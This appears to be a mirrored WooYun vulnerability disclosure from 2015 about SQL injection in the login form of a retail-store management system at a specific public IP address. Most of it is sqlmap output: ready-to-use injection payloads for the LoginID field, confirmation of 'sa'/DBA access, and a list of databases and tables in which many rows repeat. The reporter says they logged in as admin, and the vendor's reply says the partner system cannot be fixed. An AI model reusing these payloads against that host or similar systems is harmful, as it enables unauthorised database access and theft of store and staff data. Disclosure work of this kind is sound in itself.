乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-21: 细节已通知厂商并且等待厂商处理中 2015-12-21: 厂商已经确认,细节仅向厂商公开 2015-12-31: 细节向核心白帽子及相关领域专家公开 2016-01-10: 细节向普通白帽子公开 2016-01-20: 细节向实习白帽子公开 2016-02-01: 细节向公众公开
!——!
注入点:
http://222.209.200.74:8000/login.aspx (POST)LoginID=admin&loginPassword=123456&imageField.x=41&imageField.y=23
LoginID存在注入
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: LoginID Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: LoginID=admin' AND 8798=8798 AND 'nyPE'='nyPE&loginPassword=123456&imageField.x=41&imageField.y=23 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: LoginID=admin' AND 1371=CONVERT(INT,(SELECT CHAR(113)+CHAR(108)+CHAR(97)+CHAR(114)+CHAR(113)+(SELECT (CASE WHEN (1371=1371) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(109)+CHAR(102)+CHAR(110)+CHAR(113))) AND 'bwsZ'='bwsZ&loginPassword=123456&imageField.x=41&imageField.y=23 Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: LoginID=admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(108)+CHAR(97)+CHAR(114)+CHAR(113)+CHAR(89)+CHAR(76)+CHAR(83)+CHAR(89)+CHAR(81)+CHAR(101)+CHAR(70)+CHAR(73)+CHAR(69)+CHAR(116)+CHAR(113)+CHAR(109)+CHAR(102)+CHAR(110)+CHAR(113)-- &loginPassword=123456&imageField.x=41&imageField.y=23 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: LoginID=admin'; WAITFOR DELAY '0:0:5'--&loginPassword=123456&imageField.x=41&imageField.y=23 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: LoginID=admin' WAITFOR DELAY '0:0:5'--&loginPassword=123456&imageField.x=41&imageField.y=23---[03:12:51] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005[03:12:51] [INFO] fetching current usercurrent user: 'sa'[03:12:52] [INFO] fetching current databasecurrent database: 'zhongduan'[03:12:52] [INFO] testing if current user is DBAcurrent user is DBA: Truedatabase management system users [1]:[*] saavailable databases [18]:[*] BC40Fee[*] CallCenter[*] chugui[*] drpsys[*] drpsysww[*] hdcd[*] jidiao[*] leilu[*] master[*] model[*] msdb[*] nEWASSDB[*] qiaofuren[*] shuaikang[*] tempdb[*] VantageCNT[*] yangwei[*] zhongduanDatabase: zhongduan+------------------------------------------------+---------+| Table | Entries |+------------------------------------------------+---------+| dbo.Main_Log | 26577 || dbo.Main_Log | 26577 || dbo.Main_Log | 26577 || dbo.Main_Log | 26577 || dbo.Main_Log | 26577 || dbo.Main_OperationLog | 11439 || dbo.Main_OperationLog | 11439 || dbo.Main_OperationLog | 11439 || dbo.Main_OperationLog | 11439 || dbo.Main_OperationLog | 11439 || dbo.Store_ProductDetail | 5140 || dbo.Store_ProductDetail | 5140 || dbo.Store_ProductDetail | 5140 || dbo.Store_ProductDetail | 5140 || dbo.Store_ProductDetail | 5140 || dbo.Store_ProductDetail | 5140 || dbo.Store_ProductDetail | 5140 || dbo.Store_ProductDetail | 5140 || dbo.Store_ProductDetail | 5140 || dbo.Store_ProductDetail | 5140 || dbo.View_Store_UpperAndLowerProductQuery | 5140 || dbo.View_Store_UpperAndLowerProductQuery | 5140 || dbo.View_Store_UpperAndLowerProductQuery | 5140 || dbo.View_Store_UpperAndLowerProductQuery | 5140 || dbo.View_Store_UpperAndLowerProductQuery | 5140 || dbo.View_Main_UserFunction | 3370 || dbo.View_Main_UserFunction | 3370 || dbo.View_Main_UserFunction | 3370 || dbo.View_Main_UserFunction | 3370 || dbo.View_Main_UserFunction | 3370 || dbo.View_Main_UserFunction | 3370 || dbo.View_Main_UserFunction | 3370 || dbo.View_Main_UserFunction | 3370 || dbo.View_Main_UserFunction | 3370 || dbo.View_Main_UserFunction | 3370 || dbo.Store_Duty | 2941 || dbo.Store_Duty | 2941 || dbo.Store_Duty | 2941 || dbo.Store_Duty | 2941 || dbo.Store_Duty | 2941 || dbo.View_Store_Duty | 2941 || dbo.View_Store_Duty | 2941 || dbo.View_Store_Duty | 2941 || dbo.View_Store_Duty | 2941 || dbo.View_Store_Duty | 2941 || dbo.View_Store_ShoppingGuideWorkConditionQuery | 2941 || dbo.View_Store_ShoppingGuideWorkConditionQuery | 2941 || dbo.View_Store_ShoppingGuideWorkConditionQuery | 2941 || dbo.View_Store_ShoppingGuideWorkConditionQuery | 2941 || dbo.View_Store_ShoppingGuideWorkConditionQuery | 2941 || dbo.Frame_Field | 938 || dbo.Frame_Field | 938 || dbo.Frame_Field | 938 || dbo.Frame_Field | 938 || dbo.Frame_Field | 938 || dbo.Store_Sales | 720 || dbo.Store_Sales | 720 || dbo.Store_Sales | 720 || dbo.Store_Sales | 720 || dbo.Store_Sales | 720 || dbo.View_Store_SalesStatistics | 720 || dbo.View_Store_SalesStatistics | 720 || dbo.View_Store_SalesStatistics | 720 || dbo.View_Store_SalesStatistics | 720 || dbo.View_Store_SalesStatistics | 720 || dbo.View_StoreSales | 720 || dbo.View_StoreSales | 720 || dbo.View_StoreSales | 720 || dbo.View_StoreSales | 720 || dbo.View_StoreSales | 720 || dbo.ViewSales | 720 || dbo.ViewSales | 720 || dbo.ViewSales | 720 || dbo.ViewSales | 720 || dbo.ViewSales | 720 || dbo.Frame_RoleOperating | 625 || dbo.Frame_RoleOperating | 625 || dbo.Frame_RoleOperating | 625 || dbo.Frame_RoleOperating | 625 || dbo.Frame_RoleOperating | 625 || dbo.Main_Photo | 400 || dbo.Main_Photo | 400 || dbo.Main_Photo | 400 || dbo.Main_Photo | 400 || dbo.Main_Photo | 400 || dbo.View_Main_Photo | 400 || dbo.View_Main_Photo | 400 || dbo.View_Main_Photo | 400 || dbo.View_Main_Photo | 400 || dbo.View_Main_Photo | 400 || dbo.View_ShowPhotoList | 400 || dbo.View_ShowPhotoList | 400 || dbo.View_ShowPhotoList | 400 || dbo.View_ShowPhotoList | 400 || dbo.View_ShowPhotoList | 400 || dbo.Products | 364 || dbo.Products | 364 || dbo.Products | 364 || dbo.Products | 364 || dbo.Products | 364 || dbo.View_StoreProducts | 364 || dbo.View_StoreProducts | 364 || dbo.View_StoreProducts | 364 || dbo.View_StoreProducts | 364 || dbo.View_StoreProducts | 364 || dbo.Store_DailyReport | 363 || dbo.Store_DailyReport | 363 || dbo.Store_DailyReport | 363 || dbo.Store_DailyReport | 363 || dbo.Store_DailyReport | 363 || dbo.View_StoreDailyReportk | 363 || dbo.View_StoreDailyReportk | 363 || dbo.View_StoreDailyReportk | 363 || dbo.View_StoreDailyReportk | 363 || dbo.View_StoreDailyReportk | 363 || dbo.View_StoreDailyReportk | 363 || dbo.View_StoreDailyReportk | 363 || dbo.View_StoreDailyReportk | 363 || dbo.View_StoreDailyReportk | 363 || dbo.View_StoreDailyReportk | 363 || dbo.Main_RoleFunction | 301 || dbo.Main_RoleFunction | 301 || dbo.Main_RoleFunction | 301 || dbo.Main_RoleFunction | 301 || dbo.Main_RoleFunction | 301 || dbo.Main_RoleFunction | 301 || dbo.Main_RoleFunction | 301 || dbo.Main_RoleFunction | 301 || dbo.Main_RoleFunction | 301 || dbo.Main_RoleFunction | 301 || dbo.View_StorePhotoExt | 192 || dbo.View_StorePhotoExt | 192 || dbo.View_StorePhotoExt | 192 || dbo.View_StorePhotoExt | 192 || dbo.View_StorePhotoExt | 192 || dbo.View_StorePhotoExt | 192 || dbo.View_StorePhotoExt | 192 || dbo.View_StorePhotoExt | 192 || dbo.View_StorePhotoExt | 192 || dbo.View_StorePhotoExt | 192 || dbo.Store_Info | 191 || dbo.Store_Info | 191 || dbo.Store_Info | 191 || dbo.Store_Info | 191 || dbo.Store_Info | 191 || dbo.Store_CrewScheduling | 189 || dbo.Store_CrewScheduling | 189 || dbo.Store_CrewScheduling | 189 || dbo.Store_CrewScheduling | 189 || dbo.Store_CrewScheduling | 189 || dbo.View_Store_CrewScheduling | 189 || dbo.View_Store_CrewScheduling | 189 || dbo.View_Store_CrewScheduling | 189 || dbo.View_Store_CrewScheduling | 189 || dbo.View_Store_CrewScheduling | 189 || dbo.View_StoreMap | 183 || dbo.View_StoreMap | 183 || dbo.View_StoreMap | 183 || dbo.View_StoreMap | 183 || dbo.View_StoreMap | 183 || dbo.Store_Staff | 165 || dbo.Store_Staff | 165 || dbo.Store_Staff | 165 || dbo.Store_Staff | 165 || dbo.Store_Staff | 165 || dbo.View_DGYCX | 165 || dbo.View_DGYCX | 165 || dbo.View_DGYCX | 165 || dbo.View_DGYCX | 165 || dbo.View_DGYCX | 165 || dbo.View_Store_Staff | 165 || dbo.View_Store_Staff | 165 || dbo.View_Store_Staff | 165 || dbo.View_Store_Staff | 165 || dbo.View_Store_Staff | 165 || dbo.View_Store_Product | 164 || dbo.View_Store_Product | 164 || dbo.View_Store_Product | 164 || dbo.View_Store_Product | 164 || dbo.View_Store_Product | 164 || dbo.Frame_Operating | 129 || dbo.Frame_Operating | 129 || dbo.Frame_Operating | 129 || dbo.Frame_Operating | 129 || dbo.Frame_Operating | 129 || dbo.Main_Dictionary | 100 || dbo.Main_Dictionary | 100 || dbo.Main_Dictionary | 100 || dbo.Main_Dictionary | 100 || dbo.Main_Dictionary | 100 || dbo.View_Main_Dictionary | 100 || dbo.View_Main_Dictionary | 100 || dbo.View_Main_Dictionary | 100 || dbo.View_Main_Dictionary | 100 || dbo.View_Main_Dictionary | 100 || dbo.ReceiptMaxNumber | 78 || dbo.ReceiptMaxNumber | 78 || dbo.ReceiptMaxNumber | 78 || dbo.ReceiptMaxNumber | 78 || dbo.ReceiptMaxNumber | 78 || dbo.Main_UserRole | 71 || dbo.Main_UserRole | 71 || dbo.Main_UserRole | 71 || dbo.Main_UserRole | 71 || dbo.Main_UserRole | 71 || dbo.ViewDailyReport | 66 || dbo.ViewDailyReport | 66 || dbo.ViewDailyReport | 66 || dbo.ViewDailyReport | 66 || dbo.ViewDailyReport | 66 || dbo.Frame_Program | 55 || dbo.Frame_Program | 55 || dbo.Frame_Program | 55 || dbo.Frame_Program | 55 || dbo.Frame_Program | 55 || dbo.Main_Function | 52 || dbo.Main_Function | 52 || dbo.Main_Function | 52 || dbo.Main_Function | 52 || dbo.Main_Function | 52 || dbo.Frame_Object | 43 || dbo.Frame_Object | 43 || dbo.Frame_Object | 43 || dbo.Frame_Object | 43 || dbo.Frame_Object | 43 || dbo.Main_ProucetRef | 43 || dbo.Main_ProucetRef | 43 || dbo.Main_ProucetRef | 43 || dbo.Main_ProucetRef | 43 || dbo.Main_ProucetRef | 43 || dbo.Main_User | 33 || dbo.Main_User | 33 || dbo.Main_User | 33 || dbo.Main_User | 33 || dbo.Main_User | 33 || dbo.Store_ProductType | 31 || dbo.Store_ProductType | 31 || dbo.Store_ProductType | 31 || dbo.Store_ProductType | 31 || dbo.Store_ProductType | 31 || dbo.Store_Location | 22 || dbo.Store_Location | 22 || dbo.Store_Location | 22 || dbo.Store_Location | 22 || dbo.Store_Location | 22 || dbo.Main_DictionaryType | 19 || dbo.Main_DictionaryType | 19 || dbo.Main_DictionaryType | 19 || dbo.Main_DictionaryType | 19 || dbo.Main_DictionaryType | 19 || dbo.Store_LeaseApproach | 19 || dbo.Store_LeaseApproach | 19 || dbo.Store_LeaseApproach | 19 || dbo.Store_LeaseApproach | 19 || dbo.Store_LeaseApproach | 19 || dbo.View_Store_LeaseApproach | 19 || dbo.View_Store_LeaseApproach | 19 || dbo.View_Store_LeaseApproach | 19 || dbo.View_Store_LeaseApproach | 19 || dbo.View_Store_LeaseApproach | 19 || dbo.Store_Advertising | 13 || dbo.Store_Advertising | 13 || dbo.Store_Advertising | 13 || dbo.Store_Advertising | 13 || dbo.Store_Advertising | 13 || dbo.View_Store_Advertising | 13 || dbo.View_Store_Advertising | 13 || dbo.View_Store_Advertising | 13 || dbo.View_Store_Advertising | 13 || dbo.View_Store_Advertising | 13 || dbo.Frame_FieldType | 12 || dbo.Frame_FieldType | 12 || dbo.Frame_FieldType | 12 || dbo.Frame_FieldType | 12 || dbo.Frame_FieldType | 12 || dbo.Department | 11 || dbo.Department | 11 || dbo.Department | 11 || dbo.Department | 11 || dbo.Department | 11 || dbo.Main_OrganizationType | 9 || dbo.Main_OrganizationType | 9 || dbo.Main_OrganizationType | 9 || dbo.Main_OrganizationType | 9 || dbo.Main_OrganizationType | 9 || dbo.Store_CostType | 7 || dbo.Store_CostType | 7 || dbo.Store_CostType | 7 || dbo.Store_CostType | 7 || dbo.Store_CostType | 7 || dbo.View_Store_CostType | 7 || dbo.View_Store_CostType | 7 || dbo.View_Store_CostType | 7 || dbo.View_Store_CostType | 7 || dbo.View_Store_CostType | 7 || dbo.Store_CostAttribute | 6 || dbo.Store_CostAttribute | 6 || dbo.Store_CostAttribute | 6 || dbo.Store_CostAttribute | 6 || dbo.Store_CostAttribute | 6 || dbo.Store_CostAttribute | 6 || dbo.Store_CostAttribute | 6 || dbo.Store_CostAttribute | 6 || dbo.Store_CostAttribute | 6 || dbo.Store_CostAttribute | 6 || dbo.Main_FileCategory | 3 || dbo.Main_FileCategory | 3 || dbo.Main_FileCategory | 3 || dbo.Main_FileCategory | 3 || dbo.Main_FileCategory | 3 || dbo.Main_FileCategory | 3 || dbo.Main_FileCategory | 3 || dbo.Main_FileCategory | 3 || dbo.Main_FileCategory | 3 || dbo.Main_FileCategory | 3 || dbo.Main_LoadCompany | 3 || dbo.Main_LoadCompany | 3 || dbo.Main_LoadCompany | 3 || dbo.Main_LoadCompany | 3 || dbo.Main_LoadCompany | 3 || dbo.Main_Config | 2 || dbo.Main_Config | 2 || dbo.Main_Config | 2 || dbo.Main_Config | 2 || dbo.Main_Config | 2 || dbo.Main_Application | 1 || dbo.Main_Application | 1 || dbo.Main_Application | 1 || dbo.Main_Application | 1 || dbo.Main_Application | 1 || dbo.Main_Department | 1 || dbo.Main_Department | 1 || dbo.Main_Department | 1 || dbo.Main_Department | 1 || dbo.Main_Department | 1 || dbo.Store_DecorationDetail | 1 || dbo.Store_DecorationDetail | 1 || dbo.Store_DecorationDetail | 1 || dbo.Store_DecorationDetail | 1 || dbo.Store_DecorationDetail | 1 || dbo.Store_DecorationDetail | 1 || dbo.Store_DecorationDetail | 1 || dbo.Store_DecorationDetail | 1 || dbo.Store_DecorationDetail | 1 || dbo.Store_DecorationDetail | 1 || dbo.View_CostStatistics | 1 || dbo.View_CostStatistics | 1 || dbo.View_CostStatistics | 1 || dbo.View_CostStatistics | 1 || dbo.View_CostStatistics | 1 || dbo.View_Decoration | 1 || dbo.View_Decoration | 1 || dbo.View_Decoration | 1 || dbo.View_Decoration | 1 || dbo.View_Decoration | 1 || dbo.View_Store_DecorationMaterials | 1 || dbo.View_Store_DecorationMaterials | 1 || dbo.View_Store_DecorationMaterials | 1 || dbo.View_Store_DecorationMaterials | 1 || dbo.View_Store_DecorationMaterials | 1 || dbo.View_Store_DecorationMaterials | 1 || dbo.View_Store_DecorationMaterials | 1 || dbo.View_Store_DecorationMaterials | 1 || dbo.View_Store_DecorationMaterials | 1 || dbo.View_Store_DecorationMaterials | 1 || dbo.View_StoreCost | 1 || dbo.View_StoreCost | 1 || dbo.View_StoreCost | 1 || dbo.View_StoreCost | 1 || dbo.View_StoreCost | 1 || dbo.View_StoreDecoration | 1 || dbo.View_StoreDecoration | 1 || dbo.View_StoreDecoration | 1 || dbo.View_StoreDecoration | 1 || dbo.View_StoreDecoration | 1 |+------------------------------------------------+---------+
以admin、chenfei进行登录验证!~~~
DBA权限!!!!如图,就不渗入了!~~~
如上
过滤修复
危害等级:低
漏洞Rank:5
确认时间:2015-12-21 14:01
这个不是我公司的系统,他是一个合作伙伴的应用系统。代他们向路人甲表示感谢,但他们不具备修复能力,请不要公开,谢谢。
暂无
